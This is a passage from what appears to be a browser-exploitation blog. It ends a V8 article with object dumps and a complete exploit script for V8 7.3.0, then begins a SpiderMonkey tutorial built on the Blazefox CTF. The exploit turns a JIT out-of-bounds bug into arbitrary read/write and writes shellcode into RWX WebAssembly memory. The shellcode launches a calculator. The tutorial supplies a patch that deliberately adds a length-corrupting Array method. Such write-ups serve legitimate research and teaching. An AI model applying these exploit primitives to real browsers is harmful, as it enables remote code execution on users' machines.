0x00002fac7911ecd8    0x00000cdfc0080989    MAP_TYPE
0x00002fac7911ece0    0x00002fac7911ecb1    WASM_EXPORTED_FUNCTION_DATA_TYPE
0x00002fac7911ece8    0x00000cdfc00842c1    ONE_BYTE_INTERNALIZED_STRING_TYPE
0x00002fac7911ecf0    0x00000cdfc0082ad1    FEEDBACK_METADATA_TYPE
0x00002fac7911ecf8    0x00000cdfc00804c9    ODDBALL_TYPE
0x00002fac7911ed00    0x000000000000004f
0x00002fac7911ed08    0x000000000000ff00
----- [ JS_FUNCTION_TYPE : 0x38 ] -----
0x00002fac7911ed10    0x00001024ebc84191    MAP_TYPE
0x00002fac7911ed18    0x00000cdfc0080c19    FIXED_ARRAY_TYPE
0x00002fac7911ed20    0x00000cdfc0080c19    FIXED_ARRAY_TYPE
0x00002fac7911ed28    0x00002fac7911ecd9    SHARED_FUNCTION_INFO_TYPE
52417812098265


d8> %DumpObjects(0x00002fac7911ecb1,11)
----- [ WASM_EXPORTED_FUNCTION_DATA_TYPE : 0x28 ] -----
0x00002fac7911ecb0    0x00000cdfc00857a9    MAP_TYPE
0x00002fac7911ecb8    0x00002dc28a002001    CODE_TYPE
0x00002fac7911ecc0    0x00002fac7911eb29    WASM_INSTANCE_TYPE
0x00002fac7911ecc8    0x0000000000000000
0x00002fac7911ecd0    0x0000000100000000
----- [ SHARED_FUNCTION_INFO_TYPE : 0x38 ] -----
0x00002fac7911ecd8    0x00000cdfc0080989    MAP_TYPE
0x00002fac7911ece0    0x00002fac7911ecb1    WASM_EXPORTED_FUNCTION_DATA_TYPE
0x00002fac7911ece8    0x00000cdfc00842c1    ONE_BYTE_INTERNALIZED_STRING_TYPE
0x00002fac7911ecf0    0x00000cdfc0082ad1    FEEDBACK_METADATA_TYPE
0x00002fac7911ecf8    0x00000cdfc00804c9    ODDBALL_TYPE
0x00002fac7911ed00    0x000000000000004f
52417812098225


d8> %DumpObjects(0x00002fac7911eb29,41)
----- [ WASM_INSTANCE_TYPE : 0x118 : REFERENCES RWX MEMORY] -----
0x00002fac7911eb28    0x00001024ebc89411    MAP_TYPE
0x00002fac7911eb30    0x00000cdfc0080c19    FIXED_ARRAY_TYPE
0x00002fac7911eb38    0x00000cdfc0080c19    FIXED_ARRAY_TYPE
0x00002fac7911eb40    0x00002073d820bac1    WASM_MODULE_TYPE
0x00002fac7911eb48    0x00002073d820bcf1    JS_OBJECT_TYPE
0x00002fac7911eb50    0x00002fac79101741    NATIVE_CONTEXT_TYPE
0x00002fac7911eb58    0x00002fac7911ec59    WASM_MEMORY_TYPE
0x00002fac7911eb60    0x00000cdfc00804c9    ODDBALL_TYPE
0x00002fac7911eb68    0x00000cdfc00804c9    ODDBALL_TYPE
0x00002fac7911eb70    0x00000cdfc00804c9    ODDBALL_TYPE
0x00002fac7911eb78    0x00000cdfc00804c9    ODDBALL_TYPE
0x00002fac7911eb80    0x00000cdfc00804c9    ODDBALL_TYPE
0x00002fac7911eb88    0x00002073d820bc79    FIXED_ARRAY_TYPE
0x00002fac7911eb90    0x00000cdfc00804c9    ODDBALL_TYPE
0x00002fac7911eb98    0x00002073d820bc69    FOREIGN_TYPE
0x00002fac7911eba0    0x00000cdfc00804c9    ODDBALL_TYPE
0x00002fac7911eba8    0x00000cdfc00804c9    ODDBALL_TYPE
0x00002fac7911ebb0    0x00000cdfc00801d1    ODDBALL_TYPE
0x00002fac7911ebb8    0x00002dc289f94d21    CODE_TYPE
0x00002fac7911ebc0    0x0000000000000000
0x00002fac7911ebc8    0x00007f9f9cf60000
0x00002fac7911ebd0    0x0000000000010000
0x00002fac7911ebd8    0x000000000000ffff
0x00002fac7911ebe0    0x0000556b3a3e0c00
0x00002fac7911ebe8    0x0000556b3a3ea630
0x00002fac7911ebf0    0x0000556b3a3ea620
0x00002fac7911ebf8    0x0000556b3a47c210
0x00002fac7911ec00    0x0000000000000000
0x00002fac7911ec08    0x0000556b3a47c230
0x00002fac7911ec10    0x0000000000000000
0x00002fac7911ec18    0x0000000000000000
0x00002fac7911ec20    0x0000087e7c50a000    JumpTableStart [RWX]
0x00002fac7911ec28    0x0000556b3a47c250
0x00002fac7911ec30    0x0000556b3a47afa0
0x00002fac7911ec38    0x0000556b3a47afc0
----- [ TUPLE2_TYPE : 0x18 ] -----
0x00002fac7911ec40    0x00000cdfc00827c9    MAP_TYPE
0x00002fac7911ec48    0x00002fac7911eb29    WASM_INSTANCE_TYPE
0x00002fac7911ec50    0x00002073d820b849    JS_FUNCTION_TYPE
----- [ WASM_MEMORY_TYPE : 0x30 ] -----
0x00002fac7911ec58    0x00001024ebc89e11    MAP_TYPE
0x00002fac7911ec60    0x00000cdfc0080c19    FIXED_ARRAY_TYPE
0x00002fac7911ec68    0x00000cdfc0080c19    FIXED_ARRAY_TYPE
52417812097833


That gives us the following offsets:

let WasmOffsets = {
  shared_function_info : 3,
  wasm_exported_function_data : 1,
  wasm_instance : 2,
  jump_table_start : 31
};


Now simply find the JumpTableStart pointer and modify your crafted ArrayBuffer to overwrite this memory and copy your shellcode in it. Of course, you may want to backup the memory before so as to restore it after!

Full exploit

The full exploit looks like this:

// spawn gnome calculator
let shellcode = [0xe8, 0x00, 0x00, 0x00, 0x00, 0x41, 0x59, 0x49, 0x81, 0xe9, 0x05, 0x00, 0x00, 0x00, 0xb8, 0x01, 0x01, 0x00, 0x00, 0xbf, 0x6b, 0x00, 0x00, 0x00, 0x49, 0x8d, 0xb1, 0x61, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x20, 0x00, 0x0f, 0x05, 0x48, 0x89, 0xc7, 0xb8, 0x51, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x49, 0x8d, 0xb9, 0x62, 0x00, 0x00, 0x00, 0xb8, 0xa1, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xb8, 0x3b, 0x00, 0x00, 0x00, 0x49, 0x8d, 0xb9, 0x64, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x57, 0x48, 0x89, 0xe6, 0x49, 0x8d, 0x91, 0x7e, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x52, 0x48, 0x89, 0xe2, 0x0f, 0x05, 0xeb, 0xfe, 0x2e, 0x2e, 0x00, 0x2f, 0x75, 0x73, 0x72, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x67, 0x6e, 0x6f, 0x6d, 0x65, 0x2d, 0x63, 0x61, 0x6c, 0x63, 0x75, 0x6c, 0x61, 0x74, 0x6f, 0x72, 0x00, 0x44, 0x49, 0x53, 0x50, 0x4c, 0x41, 0x59, 0x3d, 0x3a, 0x30, 0x00];

let WasmOffsets = {
  shared_function_info : 3,
  wasm_exported_function_data : 1,
  wasm_instance : 2,
  jump_table_start : 31
};

let log = this.print;

let ab = new ArrayBuffer(8);
let fv = new Float64Array(ab);
let dv = new BigUint64Array(ab);

let f2i = (f) => {
  fv[0] = f;
  return dv[0];
}

let i2f = (i) => {
  dv[0] = BigInt(i);
  return fv[0];
}

let tagFloat = (f) => {
  fv[0] = f;
  dv[0] += 1n;
  return fv[0];
}

let hexprintablei = (i) => {
  return (i).toString(16).padStart(16,"0");
}

let assert = (l,r,m) => {
  if (l != r) {
    log(hexprintablei(l) + " != " + hexprintablei(r));
    log(m);
    throw "failed assert";
  }
  return true;
}

let NEW_LENGTHSMI = 0x64;
let NEW_LENGTH64 = 0x0000006400000000;

let AB_LENGTH = 0x100;

let MARK1SMI = 0x13;
let MARK2SMI = 0x37;
let MARK1 = 0x0000001300000000;
let MARK2 = 0x0000003700000000;

let ARRAYBUFFER_SIZE = 0x40;
let PTR_SIZE = 8;

let opt_me = (x) => {
  let MAGIC = 1.1; // don't move out of scope
  let arr = new Array(MAGIC,MAGIC,MAGIC);
  arr2 = Array.of(1.2); // allows to put the JSArray *before* the fixed arrays
  evil_ab = new ArrayBuffer(AB_LENGTH);
  packed_elements_array = Array.of(MARK1SMI,Math,MARK2SMI, get_pwnd);
  let y = (x == "foo") ? 4503599627370495 : 4503599627370493;
  let z = 2 + y + y ; // 2 + 4503599627370495 * 2 = 9007199254740992
  z = z + 1 + 1 + 1;
  z = z - (4503599627370495*2);

  // may trigger the OOB R/W

  let leak = arr[z];
  arr[z] = i2f(NEW_LENGTH64); // try to corrupt arr2.length

  // when leak == MAGIC, we are ready to exploit

  if (leak != MAGIC) {

    // [1] we should have corrupted arr2.length, we want to check it

    assert(f2i(leak), 0x0000000100000000, "bad layout for jsarray length corruption");
    assert(arr2.length, NEW_LENGTHSMI);

    log("[+] corrupted JSArray's length");

    // [2] now read evil_ab ArrayBuffer structure to prepare our fake array buffer

    let ab_len_idx = arr2.indexOf(i2f(AB_LENGTH));

    // check if the memory layout is consistent

    assert(ab_len_idx != -1, true, "could not find array buffer");
    assert(Number(f2i(arr2[ab_len_idx + 1])) & 1, false);
    assert(Number(f2i(arr2[ab_len_idx + 1])) > 0x10000, true);
    assert(f2i(arr2[ab_len_idx + 2]), 2);

    let ibackingstore_ptr = f2i(arr2[ab_len_idx + 1]);
    let fbackingstore_ptr = arr2[ab_len_idx + 1];

    // copy the array buffer so as to prepare a good looking fake array buffer

    let view = new BigUint64Array(evil_ab);
    for (let i = 0; i < ARRAYBUFFER_SIZE / PTR_SIZE; ++i) {
      view[i] = f2i(arr2[ab_len_idx-3+i]);
    }

    log("[+] Found backingstore pointer : " + hexprintablei(ibackingstore_ptr));

    // [3] corrupt packed_elements_array to replace the pointer to the Math object
    // by a pointer to our fake object located in our evil_ab array buffer

    let magic_mark_idx = arr2.indexOf(i2f(MARK1));
    assert(magic_mark_idx != -1, true, "could not find object pointer mark");
    assert(f2i(arr2[magic_mark_idx+2]) == MARK2, true);
    arr2[magic_mark_idx+1] = tagFloat(fbackingstore_ptr);

    // [4] leak wasm function pointer

    let ftagged_wasm_func_ptr = arr2[magic_mark_idx+3]; // we want to read get_pwnd

    log("[+] wasm function pointer at 0x" + hexprintablei(f2i(ftagged_wasm_func_ptr)));
    view[4] = f2i(ftagged_wasm_func_ptr)-1n;

    // [5] use RW primitive to find WASM RWX memory

    let rw_view = new BigUint64Array(packed_elements_array[1]);
    let shared_function_info = rw_view[WasmOffsets.shared_function_info];
    view[4] = shared_function_info - 1n; // detag pointer

    rw_view = new BigUint64Array(packed_elements_array[1]);
    let wasm_exported_function_data = rw_view[WasmOffsets.wasm_exported_function_data];
    view[4] = wasm_exported_function_data - 1n; // detag

    rw_view = new BigUint64Array(packed_elements_array[1]);
    let wasm_instance = rw_view[WasmOffsets.wasm_instance];
    view[4] = wasm_instance - 1n; // detag

    rw_view = new BigUint64Array(packed_elements_array[1]);
    let jump_table_start = rw_view[WasmOffsets.jump_table_start]; // detag

    assert(jump_table_start > 0x10000n, true);
    assert(jump_table_start & 0xfffn, 0n); // should look like an aligned pointer

    log("[+] found RWX memory at 0x" + jump_table_start.toString(16));

    view[4] = jump_table_start;
    rw_view = new Uint8Array(packed_elements_array[1]);

    // [6] write shellcode in RWX memory

    for (let i = 0; i < shellcode.length; ++i) {
      rw_view[i] = shellcode[i];
    }

    // [7] PWND!

    let res = get_pwnd();

    print(res);

  }
  return leak;
}

(() => {
  assert(this.alert, undefined); // only v8 is supported
  assert(this.version().includes("7.3.0"), true); // only tested on version 7.3.0
  // exploit is the same for both windows and linux, only shellcodes have to be changed
  // architecture is expected to be 64 bits
})()

// needed for RWX memory
load("wasm.js");

opt_me("");
for (var i = 0; i < 0x10000; ++i) // trigger optimization
  opt_me("");
let res = opt_me("foo");


Conclusion

I hope you enjoyed this article and thank you very much for reading :-) If you have any feedback or questions, just contact me on my twitter @__x86.

Special thanks to my friends 0vercl0k and yrp604 for their review!

Kudos to the awesome v8 team. You guys are doing amazing work!

Recommended reading

Introduction to SpiderMonkey exploitation.

19 November 2018 at 16:25

Introduction

This blogpost covers the development of three exploits targeting SpiderMonkey JavaScript Shell interpreter and Mozilla Firefox on Windows 10 RS5 64-bit from the perspective of somebody that has never written a browser exploit nor looked closely at any JavaScript engine codebase.

As you have probably noticed, there has been a LOT of interest in exploiting browsers in the past year or two. Every major CTF competition has at least one browser challenge, every month there are at least a write-up or two touching on browser exploitation. It is just everywhere. That is kind of why I figured I should have a little look at what a JavaScript engine is like from inside the guts, and exploit one of them. I have picked Firefox's SpiderMonkey JavaScript engine and the challenge Blazefox that has been written by itszn13.

In this blogpost, I present my findings and the three exploits I have written during this quest. Originally, the challenge was targeting a Linux x64 environment and so naturally I decided to exploit it on Windows x64 :). Now you may wonder why three different exploits?
Three different exploits allowed me to take it step by step and not face all the complexity at once. That is usually how I work day to day: I make something small work and iterate to build it up.

Here is how I organized things:

• The first thing I wrote is a WinDbg JavaScript extension called sm.js that gives me visibility into a bunch of stuff in SpiderMonkey. It is also a good exercise to familiarize yourself with the various ways objects are organized in memory. It is not necessary, but it has definitely been useful when writing the exploits.
• The first exploit, basic.js, targets a very specific build of the JavaScript interpreter, js.exe. It is full of hardcoded ugly offsets, and would have no chance to land elsewhere than on my system with this specific build of js.exe.
• The second exploit, kaizen.js, is meant to be a net improvement of basic.js. It still targets the JavaScript interpreter itself, but this time, it resolves dynamically a bunch of things like a big boy. It also uses the baseline JIT to have it generate ROP gadgets.
• The third exploit, ifrit.js, finally targets the Firefox browser with a little extra. Instead of just leveraging the baseline JIT to generate one or two ROP gadgets, we make it JIT a whole native code payload. No need to ROP, to scan for Windows API addresses or to create a writable and executable memory region anymore. We just redirect the execution flow to our payload inside the JIT code. This might be the least dull / most interesting part for people who know SpiderMonkey and have been doing browser exploitation already :).

Before starting, for those who do not feel like reading through the whole post: TL;DR I have created a blazefox GitHub repository that you can clone with all the materials.
In the repository you can find:

• sm.js which is the debugger extension mentioned above,
• The source code of the three exploits in exploits,
• A 64-bit debug build of the JavaScript shell along with private symbol information in js-asserts.7z, and a release build in js-release.7z,
• The scripts I used to build the Bring Your Own Payload technique in scripts,
• The sources that have been used to build js-release so that you can do source-level debugging in WinDbg in src/js,
• A 64-bit build of the Firefox binaries along with private symbol information for xul.dll in ff-bin.7z.001 and ff-bin.7z.002.

All right, let's buckle up and hit the road now!

Setting it up

Naturally we are going to have to set up a debugging environment. I would suggest creating a virtual machine for this as you are going to have to install a bunch of stuff you might not want to install on your personal machine.

First things first, let's get the code. Mozilla uses Mercurial for development, but they also maintain a read-only Git mirror. I recommend shallow cloning this repository to make it faster (the repository is about 420MB):

>git clone --depth 1 https://github.com/mozilla/gecko-dev.git
Cloning into 'gecko-dev'...
remote: Enumerating objects: 264314, done.
remote: Counting objects: 100% (264314/264314), done.
remote: Compressing objects: 100% (211568/211568), done.
remote: Total 264314 (delta 79982), reused 140844 (delta 44268), pack-reused 0
Receiving objects: 100% (264314/264314), 418.27 MiB | 981.00 KiB/s, done.
Resolving deltas: 100% (79982/79982), done.
Checking out files: 100% (261054/261054), done.

Sweet. For now we are interested only in building the JavaScript Shell interpreter that is part of the SpiderMonkey tree. js.exe is a simple command-line utility that can run JavaScript code. It is much faster to compile but also, more importantly, easier to attack and reason about.
We are already about to be dropped in a sea of code so let's focus on something smaller first.

Before compiling though, grab the blaze.patch file (no need to understand it just yet):

diff -r ee6283795f41 js/src/builtin/Array.cpp
--- a/js/src/builtin/Array.cpp Sat Apr 07 00:55:15 2018 +0300
+++ b/js/src/builtin/Array.cpp Sun Apr 08 00:01:23 2018 +0000
@@ -192,6 +192,20 @@
     return ToLength(cx, value, lengthp);
 }
 
+static MOZ_ALWAYS_INLINE bool
+BlazeSetLengthProperty(JSContext* cx, HandleObject obj, uint64_t length)
+{
+    if (obj->is<ArrayObject>()) {
+        obj->as<ArrayObject>().setLengthInt32(length);
+        obj->as<ArrayObject>().setCapacityInt32(length);
+        obj->as<ArrayObject>().setInitializedLengthInt32(length);
+        return true;
+    }
+    return false;
+}
+
+
+
 /*
  * Determine if the id represents an array index.
  *
@@ -1578,6 +1592,23 @@
     return DenseElementResult::Success;
 }
 
+bool js::array_blaze(JSContext* cx, unsigned argc, Value* vp)
+{
+    CallArgs args = CallArgsFromVp(argc, vp);
+    RootedObject obj(cx, ToObject(cx, args.thisv()));
+    if (!obj)
+        return false;
+
+    if (!BlazeSetLengthProperty(cx, obj, 420))
+        return false;
+
+    //uint64_t l = obj.as<ArrayObject>().setLength(cx, 420);
+
+    args.rval().setObject(*obj);
+    return true;
+}
+
+
 // ES2017 draft rev 1b0184bc17fc09a8ddcf4aeec9b6d9fcac4eafce
 // 22.1.3.21 Array.prototype.reverse ( )
 bool
@@ -3511,6 +3542,8 @@
     JS_FN("unshift", array_unshift, 1,0),
     JS_FNINFO("splice", array_splice, &array_splice_info, 2,0),
 
+    JS_FN("blaze", array_blaze, 0,0),
+
     /* Pythonic sequence methods. */
     JS_SELF_HOSTED_FN("concat", "ArrayConcat", 1,0),
     JS_INLINABLE_FN("slice", array_slice, 2,0, ArraySlice),
diff -r ee6283795f41 js/src/builtin/Array.h
--- a/js/src/builtin/Array.h Sat Apr 07 00:55:15 2018 +0300
+++ b/js/src/builtin/Array.h Sun Apr 08 00:01:23 2018 +0000
@@ -166,6 +166,9 @@
 array_reverse(JSContext* cx, unsigned argc, js::Value* vp);
 
 extern bool
+array_blaze(JSContext* cx, unsigned argc, js::Value* vp);
+
+extern bool
 array_splice(JSContext* cx, unsigned argc, js::Value* vp);
 
 extern const JSJitInfo array_splice_info;
diff -r ee6283795f41 js/src/vm/ArrayObject.h
--- a/js/src/vm/ArrayObject.h Sat Apr 07 00:55:15 2018 +0300
+++ b/js/src/vm/ArrayObject.h Sun Apr 08 00:01:23 2018 +0000
@@ -60,6 +60,14 @@
         getElementsHeader()->length = length;
     }
 
+    void setCapacityInt32(uint32_t length) {
+        getElementsHeader()->capacity = length;
+    }
+
+    void setInitializedLengthInt32(uint32_t length) {
+        getElementsHeader()->initializedLength = length;
+    }
+
     // Make an array object with the specified initial state.
     static inline ArrayObject*
     createArray(JSContext* cx,

Apply the patch as shown below and double-check that it has been properly applied (you should not run into any conflicts):

>cd gecko-dev\js

gecko-dev\js>git apply c:\work\codes\blazefox\blaze.patch

gecko-dev\js>git diff
diff --git a/js/src/builtin/Array.cpp b/js/src/builtin/Array.cpp
index 1655adbf58..e2ee96dd5e 100644
--- a/js/src/builtin/Array.cpp
+++ b/js/src/builtin/Array.cpp
@@ -202,6 +202,20 @@ GetLengthProperty(JSContext* cx, HandleObject obj, uint64_t* lengthp)
     return ToLength(cx, value, lengthp);
 }
 
+static MOZ_ALWAYS_INLINE bool
+BlazeSetLengthProperty(JSContext* cx, HandleObject obj, uint64_t length)
+{
+    if (obj->is<ArrayObject>()) {
+        obj->as<ArrayObject>().setLengthInt32(length);
+        obj->as<ArrayObject>().setCapacityInt32(length);
+        obj->as<ArrayObject>().setInitializedLengthInt32(length);
+        return true;
+    }
+    return false;
+}

At this point you can install Mozilla-Build, a meta-installer that provides every tool necessary to do development on Mozilla (toolchain, various scripts, etc.). The latest available version at the time of writing is version 3.2, which is available here: MozillaBuildSetup-3.2.exe.

Once this is installed, start up a Mozilla shell by running the start-shell.bat batch file. Go to the js\src folder of your clone and type the following to configure an x64 debug build of js.exe:

/d/gecko-dev/js/src$ autoconf-2.13

/d/gecko-dev/js/src$ mkdir build.asserts

/d/gecko-dev/js/src$ cd build.asserts

/d/gecko-dev/js/src/build.asserts$ ../configure --host=x86_64-pc-mingw32 --target=x86_64-pc-mingw32 --enable-debug

Kick off the compilation with mozmake:

/d/gecko-dev/js/src/build.asserts$ mozmake -j2


Then, you should be able to toss ./js/src/js.exe, ./mozglue/build/mozglue.dll and ./config/external/nspr/pr/nspr4.dll in a directory and voilà:

~/mozilla-central/js/src/build.asserts/js/src$ js.exe --version
JavaScript-C64.0a1

For an optimized build you can invoke configure this way:

/d/gecko-dev/js/src/build.opt$ ../configure --host=x86_64-pc-mingw32 --target=x86_64-pc-mingw32 --disable-debug --enable-optimize


SpiderMonkey

Background

SpiderMonkey is the name of Mozilla's JavaScript engine. Its source code is available on GitHub via the gecko-dev repository (under the js directory). SpiderMonkey is used by Firefox and more precisely by Gecko, its web engine. You can even embed the interpreter in your own third-party applications if you fancy it. The project is fairly big, and here are some rough stats about it:

• ~3k Classes,
• ~576k Lines of code,
• ~1.2k Files,
• ~48k Functions.

As you can see on the tree map view below (the bigger, the more lines; the darker the blue, the higher the cyclomatic complexity), the engine is basically split into six big parts: the JIT compilers, called Baseline and IonMonkey, in the jit directory; the front-end in the frontend directory; the JavaScript virtual machine in the vm directory; a bunch of builtins in the builtin directory; a garbage collector in the gc directory; and... WebAssembly in the wasm directory.

Most of the stuff I have looked at for now lives in the vm, builtin and gc folders. Another good thing going for us is that there is also a fair amount of public documentation about SpiderMonkey, its internals, design, etc.

Here are a few links that I found interesting (some might be out of date, but at this point we are just trying to digest every bit of public information we can find) if you would like to get even more background before going further:

JS::Values and JSObjects

The first thing you might be curious about is how native JavaScript objects are laid out in memory. Let's create a small script file with a few different native types and dump them directly from memory (do not forget to load the symbols). Before doing that though, a useful trick to know is to set a breakpoint on a function that is rarely called, like Math.atan2 for example. As you can pass arbitrary JavaScript objects to the function, it is then very easy to retrieve their addresses from inside the debugger. You can also use objectAddress, which is only accessible in the shell but is very useful at times.

js> a = {}
({})

js> objectAddress(a)
"000002576F8801A0"


Another pretty useful method is dumpObject but this one is only available from a debug build of the shell:

js> a = {doare : 1}
({doare:1})

js> dumpObject(a)
object 20003e8e160
global 20003e8d060 [global]
class 7ff624d94218 Object
lazy group
flags:
proto <Object at 20003e90040>
properties:
"doare": 1 (shape 20003eb1ad8 enumerate slot 0)


There are a bunch of other potentially interesting utility functions exposed to JavaScript via the shell, and if you would like to enumerate them you can run Object.getOwnPropertyNames(this):

js> Object.getOwnPropertyNames(this)
["undefined", "Boolean", "JSON", "Date", "Math", "Number", "String", "RegExp", "InternalError", "EvalError", "RangeError", "TypeError", "URIError", "ArrayBuffer", "Int8Array", "Uint8Array", "Int16Array", "Uint16Array", "Int32Array", "Uint32Array", "Float32Array", "Float64Array", "Uint8ClampedArray", "Proxy", "WeakMap", "Map", ..]


To break in the debugger when the Math.atan2 JavaScript function is called you can set a breakpoint on the below symbol:

0:001> bp js!js::math_atan2


Now just create a foo.js file with the following content:

'use strict';

const Address = Math.atan2;

const A = 0x1337;
Address(A);

const B = 13.37;
Address(B);

const C = [1, 2, 3, 4, 5];
Address(C);


At this point you have two choices: either you load the above script into the JavaScript shell and attach a debugger or, and this is what I encourage, you trace the program execution with TTD. It makes things so much easier when you are trying to investigate complex software. If you have never tried it, do it now and you will understand.

Time to load the trace and have a look around:

0:001> g
Breakpoint 0 hit
js!js::math_atan2:
00007ff69b3fe140 56              push    rsi

0:000> lsa .
260: }
261:
262: bool
263: js::math_atan2(JSContext* cx, unsigned argc, Value* vp)
>  264: {
265:     CallArgs args = CallArgsFromVp(argc, vp);
266:
267:     return math_atan2_handle(cx, args.get(0), args.get(1), args.rval());
268: }
269:


At this point you should be broken into the debugger as shown above. To be able to inspect the passed JavaScript object, we need to understand how JavaScript arguments are passed to native C++ functions.

The way it works is that vp is a pointer to an array of JS::Value of size argc + 2 (one is reserved for the return value / the callee and one is used for the this object). Functions usually do not access the array via vp directly. They wrap it in a JS::CallArgs object that abstracts away the need to calculate the number of JS::Value as well as providing useful functionalities like JS::CallArgs::get, JS::CallArgs::rval, etc. It also abstracts away GC related operations to properly keep the object alive. So let's just dump the memory pointed to by vp:

0:000> dqs @r8 l@rdx+2
0000028f87ab8198  fffe028f877a9700
0000028f87ab81a0  fffe028f87780180
0000028f87ab81a8  fff8800000001337


The first thing we notice is that every Value object seems to have its high bits set. Usually, it is a sign of clever hax to encode more information (type?) in a pointer as this part of the address space is not addressable from user-mode on Windows.

At least we recognize the 0x1337 value which is something. Let's move on to the second invocation of Address now:

0:000> g
Breakpoint 0 hit
js!js::math_atan2:
00007ff69b3fe140 56              push    rsi

0:000> dqs @r8 l@rdx+2
0000028f87ab8198  fffe028f877a9700
0000028f87ab81a0  fffe028f87780180
0000028f87ab81a8  402abd70a3d70a3d

0:000> .formats 402abd70a3d70a3d
Evaluate expression:
Hex:     402abd70a3d70a3d
Double:  13.37


Another constant we recognize. This time, the entire quad-word is used to represent the double value. And finally, here is the Array object passed to the third invocation of Address:

0:000> g
Breakpoint 0 hit
js!js::math_atan2:
00007ff69b3fe140 56              push    rsi

0:000> dqs @r8 l@rdx+2
0000028f87ab8198  fffe028f877a9700
0000028f87ab81a0  fffe028f87780180
0000028f87ab81a8  fffe028f87790400


Interesting. Well, if we look at the JS::Value structure it looks like the lower part of the quad-word is a pointer to some object.

0:000> dt -r2 js::value
+0x000 asBits_          : Uint8B
+0x000 asDouble_        : Float
+0x000 s_               : JS::Value::<unnamed-type-s_>
+0x000 i32_             : Int4B
+0x000 u32_             : Uint4B
+0x000 why_             : JSWhyMagic


By looking at public/Value.h we quickly understand what is going on with what we have seen above. The 17 higher bits (referred to as the JSVAL_TAG in the source code) of a JS::Value are used to encode type information. The lower 47 bits (47 being the value of JSVAL_TAG_SHIFT) are either the value of trivial types (integers, booleans, etc.) or a pointer to a JSObject. This part is called the payload_.

union alignas(8) Value {
private:
uint64_t asBits_;
double asDouble_;

struct {
union {
int32_t i32_;
uint32_t u32_;
JSWhyMagic why_;


Now let's take for example the JS::Value 0xfff8800000001337. To extract its tag we can right shift it by 47, and to extract the payload (an integer here, a trivial type) we can mask it with 2**47 - 1. Same with the array JS::Value from above.

In [5]: v = 0xfff8800000001337

In [6]: hex(v >> 47)
Out[6]: '0x1fff1L'

In [7]: hex(v & ((2**47) - 1))
Out[7]: '0x1337L'

In [8]: v = 0xfffe028f877a9700

In [9]: hex(v >> 47)
Out[9]: '0x1fffcL'

In [10]: hex(v & ((2**47) - 1))
Out[10]: '0x28f877a9700L'


The 0x1fff1 constant from above is JSVAL_TAG_INT32 and 0x1fffc is JSVAL_TAG_OBJECT as defined in JSValueType which makes sense:

enum JSValueType : uint8_t
{
JSVAL_TYPE_DOUBLE              = 0x00,
JSVAL_TYPE_INT32               = 0x01,
JSVAL_TYPE_BOOLEAN             = 0x02,
JSVAL_TYPE_UNDEFINED           = 0x03,
JSVAL_TYPE_NULL                = 0x04,
JSVAL_TYPE_MAGIC               = 0x05,
JSVAL_TYPE_STRING              = 0x06,
JSVAL_TYPE_SYMBOL              = 0x07,
JSVAL_TYPE_PRIVATE_GCTHING     = 0x08,
JSVAL_TYPE_OBJECT              = 0x0c,

// These never appear in a jsval; they are only provided as an out-of-band
// value.
JSVAL_TYPE_UNKNOWN             = 0x20,
JSVAL_TYPE_MISSING             = 0x21
};

{
JSVAL_TAG_MAX_DOUBLE           = 0x1FFF0,
JSVAL_TAG_INT32                = JSVAL_TAG_MAX_DOUBLE | JSVAL_TYPE_INT32,
JSVAL_TAG_UNDEFINED            = JSVAL_TAG_MAX_DOUBLE | JSVAL_TYPE_UNDEFINED,
JSVAL_TAG_NULL                 = JSVAL_TAG_MAX_DOUBLE | JSVAL_TYPE_NULL,
JSVAL_TAG_BOOLEAN              = JSVAL_TAG_MAX_DOUBLE | JSVAL_TYPE_BOOLEAN,
JSVAL_TAG_MAGIC                = JSVAL_TAG_MAX_DOUBLE | JSVAL_TYPE_MAGIC,
JSVAL_TAG_STRING               = JSVAL_TAG_MAX_DOUBLE | JSVAL_TYPE_STRING,
JSVAL_TAG_SYMBOL               = JSVAL_TAG_MAX_DOUBLE | JSVAL_TYPE_SYMBOL,
JSVAL_TAG_PRIVATE_GCTHING      = JSVAL_TAG_MAX_DOUBLE | JSVAL_TYPE_PRIVATE_GCTHING,
JSVAL_TAG_OBJECT               = JSVAL_TAG_MAX_DOUBLE | JSVAL_TYPE_OBJECT
} JS_ENUM_FOOTER(JSValueTag);
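To tie the two enums together, here is a minimal sketch that decodes a raw 64-bit JS::Value the same way we just did by hand. decodeValue and TAG_NAMES are hypothetical helpers of mine (they are not SpiderMonkey APIs), and treating every untagged value as a double is a simplification I am assuming for the sake of the example:

```javascript
// Sketch: split a 64-bit JS::Value into its 17-bit tag and 47-bit payload.
// The constants mirror the JSValueType / JSValueTag enums quoted above.
const JSVAL_TAG_SHIFT = 47n;
const JSVAL_PAYLOAD_MASK = (1n << JSVAL_TAG_SHIFT) - 1n;
const JSVAL_TAG_MAX_DOUBLE = 0x1fff0n;

// Tag -> human readable type name (tag = JSVAL_TAG_MAX_DOUBLE | JSValueType).
const TAG_NAMES = new Map([
  [JSVAL_TAG_MAX_DOUBLE | 0x01n, 'int32'],
  [JSVAL_TAG_MAX_DOUBLE | 0x02n, 'boolean'],
  [JSVAL_TAG_MAX_DOUBLE | 0x03n, 'undefined'],
  [JSVAL_TAG_MAX_DOUBLE | 0x04n, 'null'],
  [JSVAL_TAG_MAX_DOUBLE | 0x05n, 'magic'],
  [JSVAL_TAG_MAX_DOUBLE | 0x06n, 'string'],
  [JSVAL_TAG_MAX_DOUBLE | 0x07n, 'symbol'],
  [JSVAL_TAG_MAX_DOUBLE | 0x08n, 'private_gcthing'],
  [JSVAL_TAG_MAX_DOUBLE | 0x0cn, 'object'],
]);

// Hypothetical helper: takes the raw bits as a BigInt.
function decodeValue(bits) {
  const tag = bits >> JSVAL_TAG_SHIFT;
  const name = TAG_NAMES.get(tag);
  if (name === undefined) {
    // Simplification: anything without a known tag is read back as a double.
    const value = new Float64Array(new BigUint64Array([bits]).buffer)[0];
    return { type: 'double', value };
  }
  return { type: name, tag, payload: bits & JSVAL_PAYLOAD_MASK };
}

console.log(decodeValue(0xfff8800000001337n)); // the integer constant A
console.log(decodeValue(0x402abd70a3d70a3dn)); // the double constant B
console.log(decodeValue(0xfffe028f877a9700n)); // an object pointer
```

The three inputs are the quad-words dumped earlier, so the results can be compared directly with the debugger output and the Python session.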


